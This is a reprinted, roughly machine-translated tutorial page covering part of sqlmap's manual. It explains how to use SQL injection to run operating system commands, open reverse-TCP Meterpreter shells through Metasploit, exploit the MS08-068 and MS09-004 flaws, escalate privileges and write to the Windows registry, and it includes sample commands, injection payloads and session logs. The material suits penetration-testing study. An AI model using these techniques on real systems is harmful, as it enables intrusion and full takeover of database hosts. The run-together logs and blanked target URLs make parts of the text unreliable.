Safety Test ===sqlmap (iii) reprint

Source: Internet
Author: User
Tags odbc sql server driver mssql odbc sql server driver sql error sql injection sqlite git commands

XV, operating system control 1. Execute any operating system command

Parameters:--os-cmd and--os-shell

If the database management system is MySQL, PostgreSQL, or Microsoft SQL Server and the current user has the relevant permissions sqlmap can use SQL injection to execute arbitrary operating system commands.

When the database management system is MySQL or PostgreSQL, Sqlmap will upload a binary shared library file containing user-defined functions sys_exec () and Sys_eval () using the File upload feature described previously, and then create these two user-defined functions, Executes a user-specified command through one of these two functions. Which function to choose depends on whether the user wants to display the standard output of the command execution.

When the database management system is Microsoft's SQL Server, Sqlmap executes arbitrary commands through the stored procedure xp_cmdshell. If xp_cmdshell is disabled (it is disabled by default when SQL Server >= 2005) Sqlmap will enable it, and if xp_cmdshell does not exist, Sqlmap will create it.

When the user wants to see the standard output of the command execution, Sqlmap uses an enumerable injection technique (blind, in-band, and error-based injection), and the heap query injection technique is used to execute the command when the user does not want to see the standard output of the command execution.

The goal of the following example is PostgreSQL:

  python -u "" --os-cmd id -v 1

Some of the output is as follows:

Web application technology:php 5.2.6, Apache 2.2.9back-end dbms:postgresql[hh:mm:12] [INFO] fingerprinting the Back-end DBMS operating SYSTEM[HH:MM:12] [info] The Back-end DBMS operating system is linux[hh:mm:12] [info] testing if current use R is dba[hh:mm:12] [info] detecting back-end DBMS version from its banner[hh:mm:12] [INFO] checking if UDF ' Sys_eval ' alre Ady Exist[hh:mm:12] [info] checking if UDF ' sys_exec ' already exist[hh:mm:12] [info] creating UDF ' Sys_eval ' from the Bina Ry UDF file[hh:mm:12] [INFO] creating UDF ' sys_exec ' from the binary UDF Filedo your want to retrieve the command standard Output? [y/n/a] ycommand standard output: ' uid=104 (postgres) gid=106 (postgres) groups=106 (postgres) ' [hh:mm:19] [INFO] Cleaning Up the database management Systemdo do want to remove UDF ' sys_eval '? [y/n] Ydo you want to remove UDF ' sys_exec '? [y/n] y[hh:mm:23] [INFO] Database management system Cleanup FINISHED[HH:MM:23] [WARNING] Remember that UDF shared object F Iles saved on the file sysTEM can only be deleted manually 

Use the parameter "--os-shell" to simulate a shell that can execute arbitrary commands, like "--sql-shell" the shell can also be complete with the TAB key to support history.

When a heap query is not supported (such as PHP or Asp+mysql) and the database management system is Mysql, it is still possible to create a Web backdoor through this web backdoor through a SELECT clause into outfile in the writable directory of the host on which the Web is hosted to execute commands. Sqlmap supports this technology and requires users to provide a comma-separated path that may be a writable directory. SQLMAP supports the following server-side scripting languages:

    • Asp
    • asp
    • Jsp
    • Php
2. Out-of-band TCP connection: Meterpreter and related

Parameters:--os-pwn 、--os-smbrelay 、--os-bof 、--priv-esc 、--Msf-path and--tmp-path

If the database management system is MySQL, PostgreSQL, or Microsoft SQL Server and the current user has the relevant permissions Sqlmap it is possible to establish an out-of-band TCP connection between the host of the attacker and the host where the database resides. Depending on the user's choice, this connection can be an interactive command Shell,meterpreter session or a graphical user interface (VNC) session.

Sqlmap to build Shellcode by Metasploit, there are four techniques to perform shellcode on the host where the database resides:

    • The database executes Metasploit shellcode in memory using the user-defined function sys_bineval () created by Sqlmap. Support for MySQL and PostgreSQL. The parameter "--os-pwn".
    • Upload and execute Metasploit ' stand-alone payload by Sqlmap own user-defined functions (MySQL and PostgreSQL in Sys_exec (), Microsoft SQL Server xp_cmdshell ()) Stager ". Parameter: "--os-pwn".
    • Exploit remote code execution vulnerability ms08-068. The attacker's machine uses Metasploit Smb_relay to listen for connections from the target machine. Requires running Sqlmap with Root on Linux/unix and the target DBMS running on Windows with administrator privileges. Parameter: "--os-smbrelay".
    • A heap buffer Overflow Vulnerability (MS09-004) in Microsoft SQL Server 2000 and 2005 that can be sp_replwritetovarbin through stored procedures executes Metasploit shellcode in memory. Sqlmap has its own data Execution protection bypass technology that can successfully exploit vulnerabilities, but requires Metasploit generation Shellcode to execute shellcode when a vulnerability is successfully exploited. Parameter: "--os-bof".

Here is an example of MySQL targeting:

Python ""--os-pwn--msf-path/software/ Metasploit[...] [Hh:mm:31] [INFO] The back-end DBMS is mysqlweb server operating system:windows 2003web application Technology:ASP.NET, ASP. 4.0 .30319, Microsoft IIS 6.0back-end dbms:mysql 5.0[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system[hh:mm : [INFO] The Back-end DBMS operating system is windowshow does you want to establish the tunnel? [1] tcp:metasploit Framework (default) [2] icmp:icmpsh-icmp tunneling>[hh:mm:32] [INFO] testing if current user is D BA[HH:MM:32] [INFO] fetching current userwhat is the Back-end database management system architecture? [1] 32-bit (default) [2] 64-bit>[hh:mm:33] [info] checking if UDF ' sys_bineval ' already exist[hh:mm:33] [INFO] Checking If UDF ' sys_exec ' already exist[hh:mm:33] [info] detecting back-end DBMS version from its banner[hh:mm:33] [info] Retrievi Ng MySQL Base directory Absolute path[hh:mm:34] [INFO] Creating UDF ' sys_bineval ' from the binary UDF file[hh:mm:34] [INFO] creating UDF ' sys_exec ' from the binary UDF Fileho W do you want to execute the Metasploit shellcode on the Back-end database underlying operating system? [1] Via UDF ' sys_bineval ' (in-memory, anti-forensics, default) [2] stand-alone payload stager (file system) >[HH: MM:35] [INFO] creating Metasploit Framework multi-stage Shellcodewhich connection type do you want to use? [1] Reverse tcp:connect back from the database host to this machine (default) [2] Reverse tcp:try-Connect back from th  E database host to this machine, Onall portsbetween the specified and 65535[3] Bind Tcp:listen on the database host for a Connection>which is the local address? []which Local port number do you want? [60641]which payload do you want? [1] Meterpreter (default) [2] shell[3] vnc>[hh:mm:40] [INFO] creation in progress ... done[hh:mm:43] [INFO] Running Meta Sploit Framework Command Line interface Locally, please wait. =[Metasploit V3.7.0-dev [core:3.7 api:1.0]+----=[674 exploits-351 auxiliary+----=[217 payloads-27 encoders-8 nops=[SVN r12272 updated 4 days ago (2011.04.07) PAYLOAD = Windows/meterpreter/reverse_tcpexitfunc = Threadlport = > 60641LHOST =[*] Started reverse handler on[*] starting the payload handler ... [HH:MM:48] [INFO] Running Metasploit Framework shellcode remotely via UDF ' Sys_bineval ', please wait. [*] Sending stage (749056 bytes) to[*] Meterpreter Session 1 opened ( : 1689) at Mon Apr hh:mm:52 +0100 2011meterpreter > Loading extension espia...success.meterpreter > Loading extens Ion Incognito...success.meterpreter > [-] the ' priv ' extension has already been loaded.meterpreter > Loading extensi  On Sniffer...success.meterpreter > System Language:en_USOS:Windows. NET Server (Build 3790, Service Pack 2). Computer: W2k3r2architecture:x86meterpreter:x86/win32meterpreter > Server username:nt authority\systemmeterpreter > I Pconfigms TCP Loopback interfacehardware mac:00:00:00:00:00:00ip Address: (R) PRO/10 The MT Network connectionhardware mac:00:0c:29:fc:79:39ip Address: & Gt Exit[*] Meterpreter session 1 closed. Reason:user exit

In Windows, MySQL runs as system by default, but PostgreSQL runs as a low-privileged user postgres both in Windows and Linux. SQL Server 2000 runs as system by default, but SQL Server 2005 to 2008 runs most of the time as Network service, and in a few cases runs as a local service.

Use the parameter "--priv-esc" to execute the Metasploit getsystem command to try to elevate the permissions.

16. Windows Registry Operations

The Windows registry can be manipulated if the following conditions are true:

    • The target database management system is running on windows
    • The target database management system is MySQL, PostgreSQL, or Microsoft SQL Server
    • Support for Heap queries
    • The target database management system has sufficient permissions for the current user
1. Read the Windows registry key value


2. Write Windows registry key values


3. Delete Windows registry key values


4. Auxiliary

Parameters:--reg-key 、--reg-value 、--reg-data and--reg-type

Proper use of the above parameters allows you to add or modify a Windows registry key value in a command without having to provide data in a question-and-answer manner while the Sqlmap is running.

    • --reg-key: Specifies the path of the Windows registry key value
    • --reg-value: Specifies the key for the Windows registry key value
    • --reg-data: Specifies the value of the Windows registry key value
    • --reg-type: Specifies the data type of the value of the Windows registry key value

Here is an example:

  python -u --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
17. General Options 1. Load Sqlmap Session from SQLite file


Sqlmap automatically creates a long-saved session SQLite file for each target, which is stored uniformly in a specific directory (such as: ~/.sqlmap/output/), which holds all the data needed to recover the session. Use this parameter if you want to explicitly specify an SQLite file (for example, if you want to store data from multiple destinations in the same SQLite file).

2. Logging http (S) traffic to the log file


This parameter is followed by a file path, which is used to log HTTP (S) requests and responses in text format to a file. Such a log is useful when debugging.

3. Non-interactive mode


Use this parameter to allow Sqlmap to run in non-interactive mode, and all required inputs will be taken to the default values.

4. Set character encoding


To decode the data correctly, Sqlmap uses the information provided by the Web server (such as the character encoding settings in the HTTP header), or uses a third-party library Chardet to heuristic the character encoding.

You can use the parameter "--charset" to specify character encodings, such as "--CHARSET=GBK".

5. Crawl the target site starting from the destination URL


Sqlmap can start crawling the target site from the destination URL and collect URLs that may be vulnerable. Using this parameter also requires setting the crawl depth, which is relative to the destination URL where the crawl was started. The crawl ends only after all new links have been recursively accessed. It is recommended that this parameter be used in conjunction with "--delay".

The following example targets the MySQL:

  python -u "" --batch --crawl=3

Some of the output is as follows:

[xx:xx:53] [INFO] starting crawler[xx:xx:53] [INFO] searching for links with depth 1[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while[xx:xx:53] [INFO] searching for links with depth 2[xx:xx:54] [INFO] heuristics detected web page charset ‘ascii‘[xx:xx:00] [INFO] 42/56 links visited (75%)


Following this parameter is followed by a regular expression that excludes URLs that you do not want to crawl. If the URL matches the regular, it is not crawled. Use "--crawl-exclude=logout" to exclude all URLs that contain the string "logout".

6. Set the delimiter in the output CSV file


When the data is output to a CSV file (--dump-format=csv), the default is delimited by "," and you can use this parameter to specify the delimiter. such as: "--csv-del="; "".

7. Database management System authentication credentials


In some cases, due to the low current user rights of the database management system resulting in an action failure, you can use this parameter to provide the Admin user authentication credentials, Sqlmap will specifically use the "run as" mechanism for failed parts (such as: Microsoft SQL The OPENROWSET of the server) re-executes the failed action as the Admin user. Of course, you need to know the Admin user authentication credentials.

8. Data output format


Sqlmap has three different output formats for the enumerated data: CSV, HTML, and SQLite. The default is CSV format, each data table is saved in a text file, one row is a record, separated by commas (or "--csv-del" to specify the delimiter). Select HTML format, all data is stored in an HTML file, the data is stored in a table. Choose the SQLite format, all data is saved in a SQLite file, SQLite table name and structure will be the same as the original table.

9. Estimated time of completion


This parameter is used to display the estimated finish time. The following example is a Boolean blind that targets Oracle:

  python -u "" -b --eta

Some of the output is as follows:

[hh:mm:01] [INFO] the back-end DBMS is Oracle[hh:mm:01] [INFO] fetching banner[hh:mm:01] [INFO] retrieving the length of query output[hh:mm:01] [INFO] retrieved: 6417% [========>                                           ] 11/64Then:100% [===================================================] 64/64[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release - Prodweb application technology: PHP 5.2.6, Apache 2.2.9back-end DBMS: Oraclebanner:‘Oracle Database 10g Enterprise Edition Release - Prod‘

As you can see, Sqlmap calculates the length of the query output, then estimates the completion time, displays the percent progress bar, and counts the data that has been accepted.

10. Refresh the session file


Use this parameter to refresh the session file to avoid some problems that may be caused by the SQLMAP default caching mechanism. The premise of using this parameter is to really understand the concept of a session file. Another possible way is to manually delete the session file.

11. Parsing and Testing form input fields


In addition to using "-R" and "--data" to test whether the form data has an injection point, you can also use the parameter "--forms" to test whether the form data has an injection point.

Using both the parameter "--forms" and "-U", the sqlmap resolves the target URL (the one specified by "-U") back to the form on the page, testing whether the form has an injection point, and does not inject test to the destination URL.

12. Ignore query results in the session file


Use this parameter to ignore query results in the session file to re-execute the query.

13. Use the hex function for return results


Non-ASCII data can be easily transmitted in error, using the hex function to return the data in the target database in hexadecimal.

The goal of the following example is PostgreSQL:

  python -u "" --banner --hex -v 3 --parse-errors

Some of the output is as follows:

[xx:xx:14] [INFO] fetching banner[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)[xx:xx:15] [INFO] parsed error message: ‘pg_query() [<a href=‘‘></a>]: Query failed: ERROR: invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/</b> on line <b>35</b>‘[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled byGCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
14. Specify the output directory path


Sqlmap the session and result files are saved to a subdirectory output by default, you can use this parameter to specify the output directory, such as: "--output-dir=/tmp".

15. Parsing the DBMS's error message from the response


If the Web application is configured for debug mode, it is likely that SQL error messages will be displayed in the HTTP response page. These error messages are useful for understanding the cause of an operation failure. For example, the failure error message that is caused by insufficient permissions is similar to this: "Access denied for user".

The goal of the following example is Microsoft SQL Server:

  python -u "" --parse-errors

Some of the output is as follows:

[Xx:xx:17] [INFO] ORDER by technique seems to be usable. This should reduce the timeneeded to find the right number of the query columns. Automatically extending the Rangefor current UNION query injection technique TEST[XX:XX:17] [INFO] parsed error message: ' Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][odbc SQL Server driver][sql server]the ORDER by Positio N number are out of range of the number of items in the Select List.<b>/sqlmap/mssql/iis/get_int.asp, line 27</  B> ' [xx:xx:17] [INFO] parsed error message: ' Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][odbc SQL Server driver][sql server]the ORDER by position number 6 are out of range of the number of items in the Select list.<b& gt;/sqlmap/mssql/iis/get_int.asp, Line 27</b> ' [xx:xx:17] [INFO] parsed error message: ' Microsoft OLE DB Provider fo R ODBC Drivers (0x80040E14) [Microsoft][odbc SQL Server driver][sql server]the ORDER by position number 4 are out of range O F the numberof items in the Select list.<b>/sqlmap/mssql/iis/get_int.asp, line 27</b> ' [xx:xx:17] [INFO] target URL appear s to has 3 columns in query
16. Specify the middle axis column


Sometimes (as in Microsoft SQL Server, Sybase, and SAP MaxDB) it is not possible to enumerate data table records directly using offset m,n because of a lack of a similar mechanism. In this case, Sqlmap enumerates the data by determining the most appropriate axis column (the most unique value), and the value of the axis column is later used to retrieve other column values.

If the automatic selection fails, you need to manually specify the middle axis column using this parameter, such as: "--pivot-column=id".

17. Save the options in the configuration file


Use this parameter to save the SQLMAP command-line parameter to the configuration file, which can be edited and loaded with the parameter "-C". The configuration file is in INI format.

18. Upgrade Sqlmap


With this parameter you can upgrade the Sqlmap, and obviously need to be able to connect to the Internet. In the event of a failure, you can perform a "git pull" in the Sqlmap installation directory to upgrade the Sqlmap. There are no GIT commands in Windows that can use GIT clients like smartgit.

In fact, "--update" and "Git Pull" upgrade the Sqlmap in the same way, getting the latest source code from the Git repository.

It is highly recommended to upgrade Sqlmap before reporting bugs

Safety Test ===sqlmap (iii) reprint

Related Article

E-Commerce Solutions

Leverage the same tools powering the Alibaba Ecosystem

Learn more >

Apsara Conference 2019

The Rise of Data Intelligence, September 25th - 27th, Hangzhou, China

Learn more >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.